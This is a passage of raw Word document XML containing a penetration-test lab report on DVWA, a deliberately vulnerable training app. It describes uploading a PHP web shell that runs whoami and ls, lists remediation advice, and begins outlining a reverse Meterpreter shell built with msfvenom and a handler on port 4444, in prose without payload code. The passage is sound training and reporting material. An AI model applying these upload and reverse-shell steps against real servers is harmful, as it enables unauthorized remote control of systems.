        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>DVWA’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> File Upload page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390F3E54" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">The uploaded shell was accessed in a browser and executed commands like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (result: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>) and ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB706B" w14:textId="5ED405CC" w:rsidR="009D162E" w:rsidRPr="009D162E" w:rsidRDefault="00AC1034" w:rsidP="009D162E">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Key Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA6710" w14:textId="188F4875" w:rsidR="00794C15" w:rsidRPr="00794C15" w:rsidRDefault="00794C15" w:rsidP="00794C15">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794C15">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8EF142" wp14:editId="38E1EB12">
            <wp:extent cx="3457325" cy="2345635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="248948489"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8489" name="Picture 53"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79366" cy="2360589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="319833DC" w14:textId="436C4719" w:rsidR="00AC1034" w:rsidRPr="00610F6E" w:rsidRDefault="00AC1034" w:rsidP="009D162E">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00610F6E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00166030" w:rsidRPr="00610F6E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00610F6E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00610F6E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload confirmation in DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898FA7C" w14:textId="66F59CA9" w:rsidR="003312D9" w:rsidRPr="003312D9" w:rsidRDefault="003312D9" w:rsidP="003312D9">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003312D9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="445E16AE" wp14:editId="27839605">
            <wp:extent cx="6026196" cy="3315694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132458241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82414" name="Picture 1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56458" cy="3332345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A5E75" w14:textId="5A0E64A6" w:rsidR="00AC1034" w:rsidRPr="008271D4" w:rsidRDefault="00AC1034" w:rsidP="009D162E">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D7437B" w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008271D4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> command through the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D678AF" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00AC1034">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t>Unrestricted file upload allowed execution of arbitrary PHP commands, resulting in full remote command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0A4AB" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00AC1034">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461A1ED2" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Restrict file uploads to safe file types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D2AF0" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Validate MIME types and file content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105326C" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Store uploads outside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>webroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> with execution disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C2F2C" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Block dangerous extensions (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>, .asp, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AB84C" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Scan uploads with AV/EDR solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6FED6" w14:textId="77777777" w:rsidR="00F07603" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Apply least privilege to the web server account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BBD63" w14:textId="77777777" w:rsidR="00F07603" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Enforce a strict Content Security Policy (CSP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05344E0D" w14:textId="166EECB6" w:rsidR="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Enable WAF rules for XSS filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4261F" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D) Reverse Meterpreter Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF748E9" w14:textId="37666F14" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00C63F25">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Establish persistent remote control of the server using a reverse Meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4CE5D" w14:textId="0EB18DCB" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D96B6" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">A PHP reverse TCP payload was generated using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B7E2F" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The Metasploit multi/handler was configured to listen on port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4C883" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The payload was uploaded to DVWA and triggered through the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D289A" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>A Meterpreter session was opened, and commands (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>) confirmed full system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB5BB5" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
